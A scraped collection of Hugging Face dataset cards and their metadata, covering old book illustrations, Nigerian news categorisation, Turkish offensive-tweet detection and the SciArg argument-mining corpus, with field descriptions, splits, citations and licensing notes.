## Dataset Description
- Homepage
### Dataset Summary
The Old Book Illustrations dataset contains 4172 illustrations scanned from old books; this collection was collected & curated by the team of the website Old Book Illustrations.
The webmaster of Old Book Illustrations kindly allowed us to scrape this information in order to create this dataset for the BigLAM initiative.
### Languages
The captions and descriptions are mostly in English but can contain some sentences from other languages such as French or German.
For instance you can find this description that contains a French sentence:
>The caption reads in the original French: Vue de l’aqueduc de Salones qui conduisait l’eau à Spalatro.
## Dataset Structure
Each row contains information gathered from the page of an illustration on the website Old Book Illustrations. As of July 2022, there are 4172 illustrations in this dataset.
### Data Fields
* 'rawscan': the image as originally scanned from the book, without further processing
* '1600px': the cleaned image, resized to a width of 1600 pixels (height can vary)
* 'info_url': URL to the illustration page on URL
* 'ìnfo_src': URL to an icon-sized version of the image
* 'info_alt': short description of the image
* 'artist_name': artist name
* 'artist_birth_date': birth date of the artist
* 'artist_death_date': death date of the artist
* 'artist_countries': list of the countries the artist is from
* 'book_title': original title of the book the illustration is extracted from
* 'book_authors': list of the authors of the book
* 'book_publishers': list of the publishers of the book
* 'openlibrary-url': URL to the openlibrary entry for the book
* 'tags': list of keywords for this illustration on URL
* 'illustration_source_name': list of the sources for this illustration
* 'illustration_source_url': list of the URL for these sources
* 'illustration_subject': category of the subject represented in the illustration
* 'illustration_format': category of the format of the illustration
* 'image_title': title of the image
* 'image_caption': caption of the image. Seems to be the caption that appears next to the image in the book, translated to English if in another language
* 'image_description': longer description of the image. If there is one, it also quotes the caption in the original language
* 'rawscan_url': URL to the rawscan image on URL
* '1600px_url': URL to the cleaned image on URL
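As a quick sanity check, the records can be inspected with the Hugging Face 'datasets' library. This is a minimal sketch, assuming the dataset id 'gigant/oldbookillustrations' and the field names listed above; images are decoded as PIL objects.

```python
from datasets import load_dataset

# Load the single train split of the collection.
dataset = load_dataset("gigant/oldbookillustrations", split="train")

record = dataset[0]
print(record["image_title"], "-", record["artist_name"])
print(record["book_title"], record["date_published"])

# The cleaned scan (1600 pixels wide) is returned as a PIL image.
record["1600px"].show()
```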
## Dataset Creation
### Curation Rationale
This collection was collected & curated by the team of the website Old Book Illustrations.
This version contains all the data that was available on the website as of July 2022, but the website is being actively maintained so if you want more old book illustrations, make sure to check Old Book Illustrations.
### Source Data
#### Initial Data Collection and Normalization
Initial data is gathered from the website Old Book Illustrations. The sources of the illustration scans are specified for each entry in the columns 'illustration_source_name' and 'illustration_source_url'.
### Personal and Sensitive Information
The Old Book Illustrations' Terms and conditions reads:
>OBI [Old Book Illustrations] explores the art of book illustrations within boundaries defined by time and age, not by subject, treatment, or intent. This means that some illustrations might be deemed offensive, disturbing, misleading, or otherwise objectionable. We do not endorse views or opinions the Illustrations may express, neither do we guarantee that the information conveyed by any Illustration is accurate.
## Considerations for Using the Data
### Discussion of Biases
The Old Book Illustrations' Terms and conditions reads:
>OBI [Old Book Illustrations] explores the art of book illustrations within boundaries defined by time and age, not by subject, treatment, or intent. This means that some illustrations might be deemed offensive, disturbing, misleading, or otherwise objectionable. We do not endorse views or opinions the Illustrations may express, neither do we guarantee that the information conveyed by any Illustration is accurate.
## Additional Information
### Dataset Curators
The Old Book Illustrations collection is curated and maintained by the team of the Old Book Illustrations website.
### Licensing Information
Old Book Illustrations website reads:
>We don’t limit the use of the illustrations available on our site, but we accept no responsibility regarding any problem, legal or otherwise, which might result from such use. More specifically, we leave it up to users to make sure that their project complies with the copyright laws of their country of residence. Text content (descriptions, translations, etc.) is published under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.
The Old Book Illustrations webmaster mentioned that most images are public domain in the US and Europe, but there can be some exceptions. Examples are the illustrations from *Early poems of William Morris*, as the illustrator died in 1955, so her work is not public domain in Europe as of 2022, or *Under the hill*, which was published in the US in 1928 and therefore is not public domain there.
### Contributions
Thanks to @gigant (@giganttheo) for adding this dataset. | [
"# Dataset Card for Old Book Illustrations",
"## Table of Contents\n- Table of Contents\n- Dataset Description\n - Dataset Summary\n - Languages\n- Dataset Structure\n - Data Instances\n - Data Fields\n- Dataset Creation\n - Curation Rationale\n - Source Data\n - Personal and Sensitive Information\n- Considerations for Using the Data\n - Discussion of Biases\n- Additional Information\n - Dataset Curators\n - Licensing Information\n - Citation Information\n - Contributions",
"## Dataset Description\n\n- Homepage",
"### Dataset Summary\n\nThe Old Book Illustrations contains 4172 illustrations scanned from old books, this collection was collected & curated by the team of the website Old Book Illustrations.\nThe webmaster of Old Book Illustrations kindly allowed us to scrap these information in order to create this dataset for the BigLAM initiative.",
"### Languages\n\nThe captions and descriptions are mostly in English but can contain some sentences from other languages such as French or German.\nFor instance you can find this description that contains a French sentence:\n\n>The caption reads in the original French: Vue de l’aqueduc de Salones qui conduisait l’eau à Spalatro.",
"## Dataset Structure\n\nEach row contains information gathered from the page of an illustration on the website Old Book Illustrations. As of July 2022, there are 4172 illustrations in this dataset.",
"### Data Fields\n\n* 'rawscan': the image as originally scanned from the book, without further processing\n* '1600px': the cleaned image, resized to a width of 1600 pixels (height can vary)\n* 'info_url': URL to the illustration page on URL\n* 'ìnfo_src': URL to an icon-sized version of the image\n* 'info_alt': short description of the image\n* 'artist_name': artist name\n* 'artist_date': birth date of the artist\n* 'artist_countries': list of the countries the artist is from\n* 'book_title': original title of the book the illustration is extracted from\n* 'book_authors': list of the authors of the book\n* 'book_publishers': list of the publishers of the book\n* 'openlibrary-url': URL to the openlibrary entry for the book\n* 'tags': list of keywords for this illustration on URL\n* 'illustration_source_name': list of the sources for this illustration\n* 'illustration_source_url': list of the URL for these sources\n* 'illustration_subject': category of the subject represented in the illustration\n* 'illustration_format': category of the format of the illustration\n* 'image_title': title of the image\n* 'image_caption': caption of the image. Seems to be the caption that appears next to the image in the book, translated to English if in another language\n* 'image_description': longer description of the image. If there is one, it also quotes the caption in the original language\n* 'rawscan_url': URL to the rawscan image on URL\n* '1600px_url': URL to the cleaned image on URL",
"## Dataset Creation",
"### Curation Rationale\n\nThis collection was collected & curated by the team of the website Old Book Illustrations.\nThis version contains all the data that was available on the website as of July 2022, but the website is being actively maintained so if you want more old book illustrations, make sure to check Old Book Illustrations.",
"### Source Data",
"#### Initial Data Collection and Normalization\n\nInitial data is gathered from the website Old Book Illustrations. The sources of the illustration scans are specified for each entry in the columns 'illustration_source_name' and 'illustration_source_url'.",
"### Personal and Sensitive Information\n\nThe Old Book Illustrations' Terms and conditions reads:\n>OBI [Old Book Illustrations] explores the art of book illustrations within boundaries defined by time and age, not by subject, treatment, or intent. This means that some illustrations might be deemed offensive, disturbing, misleading, or otherwise objectionable. We do not endorse views or opinions the Illustrations may express, neither do we guarantee that the information conveyed by any Illustration is accurate.",
"## Considerations for Using the Data",
"### Discussion of Biases\n\nThe Old Book Illustrations' Terms and conditions reads:\n>OBI [Old Book Illustrations] explores the art of book illustrations within boundaries defined by time and age, not by subject, treatment, or intent. This means that some illustrations might be deemed offensive, disturbing, misleading, or otherwise objectionable. We do not endorse views or opinions the Illustrations may express, neither do we guarantee that the information conveyed by any Illustration is accurate.",
"## Additional Information",
"### Dataset Curators\n\nThe Old Book Illustrations collection is curated and maintained by the team of the Old Book Illustrations website.",
"### Licensing Information\n\nOld Book Illustrations website reads:\n>We don’t limit the use of the illustrations available on our site, but we accept no responsibility regarding any problem, legal or otherwise, which might result from such use. More specifically, we leave it up to users to make sure that their project complies with the copyright laws of their country of residence. Text content (descriptions, translations, etc.) is published under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.\n\nThe Old Book Illustrations webmaster mentioned that most images are public domain in the US and Europe, but there can be some exceptions. An example are the illustrations from *Early poems of William Morris* as the illustrator died 1955, so her work is not public domain in Europe as of 2022, or *Under the hill* which was published in the US in 1928 and therefore is not public domain there.",
"### Contributions\n\nThanks to @gigant (@giganttheo) for adding this dataset."
] | [
"TAGS\n#task_categories-text-to-image #task_categories-image-to-text #task_categories-image-to-image #task_ids-image-captioning #annotations_creators-expert-generated #language_creators-expert-generated #multilinguality-multilingual #size_categories-1K<n<10K #source_datasets-original #language-English #language-French #language-German #license-cc-by-nc-4.0 #lam #1800-1900 #region-us \n",
"# Dataset Card for Old Book Illustrations",
"## Table of Contents\n- Table of Contents\n- Dataset Description\n - Dataset Summary\n - Languages\n- Dataset Structure\n - Data Instances\n - Data Fields\n- Dataset Creation\n - Curation Rationale\n - Source Data\n - Personal and Sensitive Information\n- Considerations for Using the Data\n - Discussion of Biases\n- Additional Information\n - Dataset Curators\n - Licensing Information\n - Citation Information\n - Contributions",
"## Dataset Description\n\n- Homepage",
"### Dataset Summary\n\nThe Old Book Illustrations contains 4172 illustrations scanned from old books, this collection was collected & curated by the team of the website Old Book Illustrations.\nThe webmaster of Old Book Illustrations kindly allowed us to scrap these information in order to create this dataset for the BigLAM initiative.",
"### Languages\n\nThe captions and descriptions are mostly in English but can contain some sentences from other languages such as French or German.\nFor instance you can find this description that contains a French sentence:\n\n>The caption reads in the original French: Vue de l’aqueduc de Salones qui conduisait l’eau à Spalatro.",
"## Dataset Structure\n\nEach row contains information gathered from the page of an illustration on the website Old Book Illustrations. As of July 2022, there are 4172 illustrations in this dataset.",
"### Data Fields\n\n* 'rawscan': the image as originally scanned from the book, without further processing\n* '1600px': the cleaned image, resized to a width of 1600 pixels (height can vary)\n* 'info_url': URL to the illustration page on URL\n* 'ìnfo_src': URL to an icon-sized version of the image\n* 'info_alt': short description of the image\n* 'artist_name': artist name\n* 'artist_date': birth date of the artist\n* 'artist_countries': list of the countries the artist is from\n* 'book_title': original title of the book the illustration is extracted from\n* 'book_authors': list of the authors of the book\n* 'book_publishers': list of the publishers of the book\n* 'openlibrary-url': URL to the openlibrary entry for the book\n* 'tags': list of keywords for this illustration on URL\n* 'illustration_source_name': list of the sources for this illustration\n* 'illustration_source_url': list of the URL for these sources\n* 'illustration_subject': category of the subject represented in the illustration\n* 'illustration_format': category of the format of the illustration\n* 'image_title': title of the image\n* 'image_caption': caption of the image. Seems to be the caption that appears next to the image in the book, translated to English if in another language\n* 'image_description': longer description of the image. If there is one, it also quotes the caption in the original language\n* 'rawscan_url': URL to the rawscan image on URL\n* '1600px_url': URL to the cleaned image on URL",
"## Dataset Creation",
"### Curation Rationale\n\nThis collection was collected & curated by the team of the website Old Book Illustrations.\nThis version contains all the data that was available on the website as of July 2022, but the website is being actively maintained so if you want more old book illustrations, make sure to check Old Book Illustrations.",
"### Source Data",
"#### Initial Data Collection and Normalization\n\nInitial data is gathered from the website Old Book Illustrations. The sources of the illustration scans are specified for each entry in the columns 'illustration_source_name' and 'illustration_source_url'.",
"### Personal and Sensitive Information\n\nThe Old Book Illustrations' Terms and conditions reads:\n>OBI [Old Book Illustrations] explores the art of book illustrations within boundaries defined by time and age, not by subject, treatment, or intent. This means that some illustrations might be deemed offensive, disturbing, misleading, or otherwise objectionable. We do not endorse views or opinions the Illustrations may express, neither do we guarantee that the information conveyed by any Illustration is accurate.",
"## Considerations for Using the Data",
"### Discussion of Biases\n\nThe Old Book Illustrations' Terms and conditions reads:\n>OBI [Old Book Illustrations] explores the art of book illustrations within boundaries defined by time and age, not by subject, treatment, or intent. This means that some illustrations might be deemed offensive, disturbing, misleading, or otherwise objectionable. We do not endorse views or opinions the Illustrations may express, neither do we guarantee that the information conveyed by any Illustration is accurate.",
"## Additional Information",
"### Dataset Curators\n\nThe Old Book Illustrations collection is curated and maintained by the team of the Old Book Illustrations website.",
"### Licensing Information\n\nOld Book Illustrations website reads:\n>We don’t limit the use of the illustrations available on our site, but we accept no responsibility regarding any problem, legal or otherwise, which might result from such use. More specifically, we leave it up to users to make sure that their project complies with the copyright laws of their country of residence. Text content (descriptions, translations, etc.) is published under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.\n\nThe Old Book Illustrations webmaster mentioned that most images are public domain in the US and Europe, but there can be some exceptions. An example are the illustrations from *Early poems of William Morris* as the illustrator died 1955, so her work is not public domain in Europe as of 2022, or *Under the hill* which was published in the US in 1928 and therefore is not public domain there.",
"### Contributions\n\nThanks to @gigant (@giganttheo) for adding this dataset."
] |
2c53f4b94137892d96c3bc4272028c3354c640a7 |
# Dataset Card for news-data
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Dataset Curators](#dataset-curators)
### Dataset Summary
The News Dataset is an English-language dataset containing just over 4k unique news articles scraped from AriseTV, one of the most popular news television stations in Nigeria.
### Supported Tasks and Leaderboards
It supports news article classification into different categories.
### Languages
English
## Dataset Structure
### Data Instances
```python
{'Title': 'Nigeria: APC Yet to Zone Party Positions Ahead of Convention',
 'Excerpt': 'The leadership of the All Progressives Congress (APC), has denied reports that it had zoned some party positions ahead of',
 'Category': 'politics',
 'labels': 2}
```
### Data Fields
* Title: a string containing the title of a news title as shown
* Excerpt: a string containing a short extract from the body of the news
* Category: a string that tells the category of an example (string label)
* labels: integer telling the class of an example (label)
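
For illustration, here is a minimal sketch of how these fields can be combined into a single classification input with the Hugging Face `datasets` library. The dataset id and the `train` split name are assumptions based on this card.

```python
from datasets import load_dataset

# Assumed dataset id; split names may differ from the splits table.
news = load_dataset("okite97/news-data", split="train")

def to_text(example):
    # Join title and excerpt into one input string for a classifier.
    example["text"] = example["Title"] + ". " + (example["Excerpt"] or "")
    return example

news = news.map(to_text)
print(news[0]["text"][:80], "->", news[0]["Category"], news[0]["labels"])
```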
### Data Splits
| Dataset Split | Number of instances in split |
| ----------- | ----------- |
| Train | 4,594 |
| Test | 811 |
## Dataset Creation
### Source Data
#### Initial Data Collection and Normalization
The code for the dataset creation is at *https://github.com/chimaobi-okite/NLP-Projects-Competitions/blob/main/NewsCategorization/Data/NewsDataScraping.ipynb*. The examples were scraped from
<https://www.arise.tv/>
### Annotations
#### Annotation process
The annotation is based on the news categories on the [arisetv](https://www.arise.tv) website
#### Who are the annotators?
Journalists at arisetv
## Considerations for Using the Data
### Social Impact of Dataset
The purpose of this dataset is to help develop models that can classify news articles into categories.
This task is useful for efficiently presenting information given a large quantity of text. It should be made clear that any predictions produced by models trained on this dataset are reflective of the language used in the articles, but are in fact automatically generated.
### Discussion of Biases
This data is biased towards news events in Nigeria, but a model built using it can also classify news from other parts of the world, with a slight degradation in performance.
### Dataset Curators
The dataset was created by people at Arise but was scraped by [@github-chimaobi-okite](https://github.com/chimaobi-okite/)
| okite97/news-data | [
"task_categories:text-classification",
"task_ids:topic-classification",
"task_ids:multi-class-classification",
"annotations_creators:other",
"language_creators:found",
"multilinguality:monolingual",
"size_categories:1K<n<10K",
"source_datasets:original",
"language:en",
"license:afl-3.0",
"region:us"
] | 2022-07-28T08:10:22+00:00 | {"annotations_creators": ["other"], "language_creators": ["found"], "language": ["en"], "license": ["afl-3.0"], "multilinguality": ["monolingual"], "size_categories": ["1K<n<10K"], "source_datasets": ["original"], "task_categories": ["text-classification"], "task_ids": ["topic-classification", "multi-class-classification"], "pretty_name": "News Dataset", "tags": []} | 2022-08-25T09:36:01+00:00 | [] | [
"en"
] | TAGS
#task_categories-text-classification #task_ids-topic-classification #task_ids-multi-class-classification #annotations_creators-other #language_creators-found #multilinguality-monolingual #size_categories-1K<n<10K #source_datasets-original #language-English #license-afl-3.0 #region-us
| Dataset Card for news-data
==========================
Table of Contents
-----------------
* Table of Contents
* Dataset Description
+ Dataset Summary
+ Supported Tasks and Leaderboards
+ Languages
* Dataset Structure
+ Data Instances
+ Data Fields
+ Data Splits
* Dataset Creation
+ Curation Rationale
+ Source Data
+ Annotations
* Considerations for Using the Data
+ Social Impact of Dataset
+ Discussion of Biases
+ Dataset Curators
### Dataset Summary
The News Dataset is an English-language dataset containing just over 4k unique news articles scraped from AriseTV, one of the most popular news television stations in Nigeria.
### Supported Tasks and Leaderboards
It supports news article classification into different categories.
### Languages
English
Dataset Structure
-----------------
### Data Instances
'''
{'Title': 'Nigeria: APC Yet to Zone Party Positions Ahead of Convention'
'Excerpt': 'The leadership of the All Progressives Congress (APC), has denied reports that it had zoned some party positions ahead of'
'Category': 'politics'
'labels': 2}
'''
### Data Fields
* Title: a string containing the title of a news title as shown
* Excerpt: a string containing a short extract from the body of the news
* Category: a string that tells the category of an example (string label)
* labels: integer telling the class of an example (label)
### Data Splits
Dataset Creation
----------------
### Source Data
#### Initial Data Collection and Normalization
The code for the dataset creation is at \*URL. The examples were scraped from
<URL
### Annotations
#### Annotation process
The annotation is based on the news categories on the arisetv website
#### Who are the annotators?
Journalists at arisetv
Considerations for Using the Data
---------------------------------
### Social Impact of Dataset
The purpose of this dataset is to help develop models that can classify news articles into categories.
This task is useful for efficiently presenting information given a large quantity of text. It should be made clear that any predictions produced by models trained on this dataset are reflective of the language used in the articles, but are in fact automatically generated.
### Discussion of Biases
This data is biased towards news events in Nigeria, but a model built using it can also classify news from other parts of the world,
with a slight degradation in performance.
### Dataset Curators
The dataset was created by people at Arise but was scraped by @github-chimaobi-okite
| [
"### Dataset Summary\n\n\nThe News Dataset is an English-language dataset containing just over 4k unique news articles scrapped from AriseTv- One of the most popular news television in Nigeria.",
"### Supported Tasks and Leaderboards\n\n\nIt supports news article classification into different categories.",
"### Languages\n\n\nEnglish\n\n\nDataset Structure\n-----------------",
"### Data Instances\n\n\n'''\n{'Title': 'Nigeria: APC Yet to Zone Party Positions Ahead of Convention'\n'Excerpt': 'The leadership of the All Progressives Congress (APC), has denied reports that it had zoned some party positions ahead of'\n'Category': 'politics'\n'labels': 2}\n'''",
"### Data Fields\n\n\n* Title: a string containing the title of a news title as shown\n* Excerpt: a string containing a short extract from the body of the news\n* Category: a string that tells the category of an example (string label)\n* labels: integer telling the class of an example (label)",
"### Data Splits\n\n\n\nDataset Creation\n----------------",
"### Source Data",
"#### Initial Data Collection and Normalization\n\n\nThe code for the dataset creation at \\*URL The examples were scrapped from\n<URL",
"### Annotations",
"#### Annotation process\n\n\nThe annotation is based on the news category in the arisetv website",
"#### Who are the annotators?\n\n\nJournalists at arisetv\n\n\nConsiderations for Using the Data\n---------------------------------",
"### Social Impact of Dataset\n\n\nThe purpose of this dataset is to help develop models that can classify news articles into categories.\n\n\nThis task is useful for efficiently presenting information given a large quantity of text. It should be made clear that any summarizations produced by models trained on this dataset are reflective of the language used in the articles, but are in fact automatically generated.",
"### Discussion of Biases\n\n\nThis data is biased towards news happenings in Nigeria but the model built using it can as well classify news from other parts of the world\nwith a slight degradation in performance.",
"### Dataset Curators\n\n\nThe dataset is created by people at arise but was scrapped by @github-chimaobi-okite"
] | [
"TAGS\n#task_categories-text-classification #task_ids-topic-classification #task_ids-multi-class-classification #annotations_creators-other #language_creators-found #multilinguality-monolingual #size_categories-1K<n<10K #source_datasets-original #language-English #license-afl-3.0 #region-us \n",
"### Dataset Summary\n\n\nThe News Dataset is an English-language dataset containing just over 4k unique news articles scrapped from AriseTv- One of the most popular news television in Nigeria.",
"### Supported Tasks and Leaderboards\n\n\nIt supports news article classification into different categories.",
"### Languages\n\n\nEnglish\n\n\nDataset Structure\n-----------------",
"### Data Instances\n\n\n'''\n{'Title': 'Nigeria: APC Yet to Zone Party Positions Ahead of Convention'\n'Excerpt': 'The leadership of the All Progressives Congress (APC), has denied reports that it had zoned some party positions ahead of'\n'Category': 'politics'\n'labels': 2}\n'''",
"### Data Fields\n\n\n* Title: a string containing the title of a news title as shown\n* Excerpt: a string containing a short extract from the body of the news\n* Category: a string that tells the category of an example (string label)\n* labels: integer telling the class of an example (label)",
"### Data Splits\n\n\n\nDataset Creation\n----------------",
"### Source Data",
"#### Initial Data Collection and Normalization\n\n\nThe code for the dataset creation at \\*URL The examples were scrapped from\n<URL",
"### Annotations",
"#### Annotation process\n\n\nThe annotation is based on the news category in the arisetv website",
"#### Who are the annotators?\n\n\nJournalists at arisetv\n\n\nConsiderations for Using the Data\n---------------------------------",
"### Social Impact of Dataset\n\n\nThe purpose of this dataset is to help develop models that can classify news articles into categories.\n\n\nThis task is useful for efficiently presenting information given a large quantity of text. It should be made clear that any summarizations produced by models trained on this dataset are reflective of the language used in the articles, but are in fact automatically generated.",
"### Discussion of Biases\n\n\nThis data is biased towards news happenings in Nigeria but the model built using it can as well classify news from other parts of the world\nwith a slight degradation in performance.",
"### Dataset Curators\n\n\nThe dataset is created by people at arise but was scrapped by @github-chimaobi-okite"
] |
5aff92f9c824061b0781a5ff1bbf1e8246de5840 |
# Dataset Summary
This dataset is an enhanced version of existing offensive-language studies. Existing studies are highly imbalanced, and solving this problem is too costly. To solve this, we proposed a contextual data mining method for dataset augmentation. Our method avoids retrieving random tweets and labeling them individually: we can directly access almost exactly the hate-related tweets and label them without any further human interaction, which solves the imbalanced-label problem.

In addition, existing studies *(listed in the References section)* are merged to create an even more comprehensive and robust dataset for the Turkish offensive language detection task.
The file train.csv contains 42,398 annotated tweets, test.csv contains 8,851, and valid.csv contains 1,756.
# Dataset Structure
A binary dataset with (0) Not Offensive and (1) Offensive tweets.
### Task and Labels
Offensive language identification:
- (0) Not Offensive - Tweet does not contain offense or profanity.
- (1) Offensive - Tweet contains offensive language or a targeted (veiled or direct) offense
### Data Splits
| | train | test | dev |
|------:|:------|:-----|:-----|
| 0 (Not Offensive) | 22,589 | 4,436 | 1,402 |
| 1 (Offensive) | 19,809 | 4,415 | 354 |
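
A minimal sketch of how the files and label balance described above can be checked, assuming the CSVs have been downloaded locally and use a binary `label` column (the column name is an assumption, not confirmed by this card):

```python
import pandas as pd

train = pd.read_csv("train.csv")   # 42,398 rows expected
test = pd.read_csv("test.csv")     # 8,851 rows expected

# Label balance should roughly match the table above.
print(train["label"].value_counts())  # ~22,589 zeros vs ~19,809 ones
print(test["label"].value_counts())   # ~4,436 zeros vs ~4,415 ones
```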
### Citation Information
```
T. Tanyel, B. Alkurdi and S. Ayvaz, "Linguistic-based Data Augmentation Approach for Offensive Language Detection," 2022 7th International Conference on Computer Science and Engineering (UBMK), 2022, pp. 1-6, doi: 10.1109/UBMK55850.2022.9919562.
```
### Paper codes
https://github.com/tanyelai/lingda
# References
We merged open-source offensive language dataset studies in Turkish to increase contextuality with existing data even more, before our method is applied.
- https://huggingface.co/datasets/offenseval2020_tr
- https://github.com/imayda/turkish-hate-speech-dataset-2
- https://www.kaggle.com/datasets/kbulutozler/5k-turkish-tweets-with-incivil-content
| Toygar/turkish-offensive-language-detection | [
"task_categories:text-classification",
"annotations_creators:crowdsourced",
"annotations_creators:expert-generated",
"language_creators:crowdsourced",
"multilinguality:monolingual",
"size_categories:10K<n<100K",
"language:tr",
"license:cc-by-2.0",
"offensive-language-classification",
"region:us"
] | 2022-07-28T10:45:25+00:00 | {"annotations_creators": ["crowdsourced", "expert-generated"], "language_creators": ["crowdsourced"], "language": ["tr"], "license": ["cc-by-2.0"], "multilinguality": ["monolingual"], "size_categories": ["10K<n<100K"], "source_datasets": [], "task_categories": ["text-classification"], "task_ids": [], "pretty_name": "Turkish Offensive Language Detection Dataset", "tags": ["offensive-language-classification"]} | 2023-10-31T21:57:24+00:00 | [] | [
"tr"
] | TAGS
#task_categories-text-classification #annotations_creators-crowdsourced #annotations_creators-expert-generated #language_creators-crowdsourced #multilinguality-monolingual #size_categories-10K<n<100K #language-Turkish #license-cc-by-2.0 #offensive-language-classification #region-us
| Dataset Summary
===============
This dataset is an enhanced version of existing offensive-language studies. Existing studies are highly imbalanced, and solving this problem is too costly. To solve this, we proposed a contextual data mining method for dataset augmentation. Our method avoids retrieving random tweets and labeling them individually: we can directly access almost exactly the hate-related tweets and label them without any further human interaction, which solves the imbalanced-label problem.

In addition, existing studies *(listed in the References section)* are merged to create an even more comprehensive and robust dataset for the Turkish offensive language detection task.

The file URL contains 42,398 annotated tweets, URL contains 8,851, and URL contains 1,756.
Dataset Structure
=================
A binary dataset with (0) Not Offensive and (1) Offensive tweets.
### Task and Labels
Offensive language identification:
* (0) Not Offensive - Tweet does not contain offense or profanity.
* (1) Offensive - Tweet contains offensive language or a targeted (veiled or direct) offense
### Data Splits
### Paper codes
URL
References
==========
We merged open-source offensive language dataset studies in Turkish to increase contextuality with existing data even more, before our method is applied.
* URL
* URL
* URL
| [
"### Task and Labels\n\n\nOffensive language identification:\n\n\n* (0) Not Offensive - Tweet does not contain offense or profanity.\n* (1) Offensive - Tweet contains offensive language or a targeted (veiled or direct) offense",
"### Data Splits",
"### Paper codes\n\n\nURL\n\n\nReferences\n==========\n\n\nWe merged open-source offensive language dataset studies in Turkish to increase contextuality with existing data even more, before our method is applied.\n\n\n* URL\n* URL\n* URL"
] | [
"TAGS\n#task_categories-text-classification #annotations_creators-crowdsourced #annotations_creators-expert-generated #language_creators-crowdsourced #multilinguality-monolingual #size_categories-10K<n<100K #language-Turkish #license-cc-by-2.0 #offensive-language-classification #region-us \n",
"### Task and Labels\n\n\nOffensive language identification:\n\n\n* (0) Not Offensive - Tweet does not contain offense or profanity.\n* (1) Offensive - Tweet contains offensive language or a targeted (veiled or direct) offense",
"### Data Splits",
"### Paper codes\n\n\nURL\n\n\nReferences\n==========\n\n\nWe merged open-source offensive language dataset studies in Turkish to increase contextuality with existing data even more, before our method is applied.\n\n\n* URL\n* URL\n* URL"
] |
15ba2479192e7cf974e4e295a7d721a650c06f03 |
# Dataset Card for "sciarg"
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:** [https://github.com/anlausch/ArguminSci](https://github.com/anlausch/ArguminSci)
- **Repository:** [https://github.com/anlausch/ArguminSci](https://github.com/anlausch/ArguminSci)
- **Paper:** [An argument-annotated corpus of scientific publications](https://aclanthology.org/W18-5206.pdf)
- **Leaderboard:** [More Information Needed](https://github.com/huggingface/datasets/blob/master/CONTRIBUTING.md#how-to-contribute-to-the-dataset-cards)
- **Point of Contact:** [More Information Needed](https://github.com/huggingface/datasets/blob/master/CONTRIBUTING.md#how-to-contribute-to-the-dataset-cards)
### Dataset Summary
The SciArg dataset is an extension of the Dr. Inventor corpus (Fisas et al., 2015, 2016) with an annotation layer containing
fine-grained argumentative components and relations. It is the first argument-annotated corpus of scientific
publications (in English), which allows for joint analyses of argumentation and other rhetorical dimensions of
scientific writing.
### Supported Tasks and Leaderboards
[More Information Needed](https://github.com/huggingface/datasets/blob/master/CONTRIBUTING.md#how-to-contribute-to-the-dataset-cards)
### Languages
The language in the dataset is English.
## Dataset Structure
### Data Instances
[More Information Needed]
### Data Fields
- `document_id`: the base file name, e.g. "A28"
- `text`: the parsed text of the scientific publication in the XML format
- `text_bound_annotations`: span annotations that mark argumentative discourse units (ADUs). Each entry has the following fields: `offsets`, `text`, `type`, and `id`.
- `relations`: binary relation annotations that mark the argumentative relations that hold between a head and a tail ADU. Each entry has the following fields: `id`, `head`, `tail`, and `type` where `head` and `tail` each have the fields: `ref_id` and `role`.
### Data Splits
The dataset consists of a single `train` split that has 40 documents.
## Dataset Creation
### Curation Rationale
[More Information Needed]
### Source Data
#### Initial Data Collection and Normalization
[More Information Needed]
#### Who are the source language producers?
[More Information Needed]
### Annotations
#### Annotation process
[More Information Needed]
#### Who are the annotators?
[More Information Needed]
### Personal and Sensitive Information
[More Information Needed]
## Considerations for Using the Data
### Social Impact of Dataset
[More Information Needed]
### Discussion of Biases
[More Information Needed]
### Other Known Limitations
[More Information Needed]
## Additional Information
### Dataset Curators
[More Information Needed]
### Licensing Information
[More Information Needed]
### Citation Information
```
@inproceedings{lauscher2018b,
title = {An argument-annotated corpus of scientific publications},
  booktitle = {Proceedings of the 5th Workshop on Argument Mining},
publisher = {Association for Computational Linguistics},
author = {Lauscher, Anne and Glava\v{s}, Goran and Ponzetto, Simone Paolo},
address = {Brussels, Belgium},
year = {2018},
pages = {40–46}
}
```
### Contributions
Thanks to [@github-username](https://github.com/<github-username>) for adding this dataset.
| DFKI-SLT/sciarg | [
"task_categories:token-classification",
"annotations_creators:expert-generated",
"language_creators:expert-generated",
"multilinguality:monolingual",
"size_categories:1K<n<10K",
"source_datasets:dr inventor corpus",
"language:en",
"argument mining",
"scientific text",
"relation extraction",
"argumentative discourse unit recognition",
"region:us"
] | 2022-07-28T12:55:00+00:00 | {"annotations_creators": ["expert-generated"], "language_creators": ["expert-generated"], "language": ["en"], "license": [], "multilinguality": ["monolingual"], "size_categories": ["1K<n<10K"], "source_datasets": ["dr inventor corpus"], "task_categories": ["token-classification"], "task_ids": [], "pretty_name": "SciArg", "tags": ["argument mining", "scientific text", "relation extraction", "argumentative discourse unit recognition"]} | 2022-07-28T13:04:31+00:00 | [] | [
"en"
] | TAGS
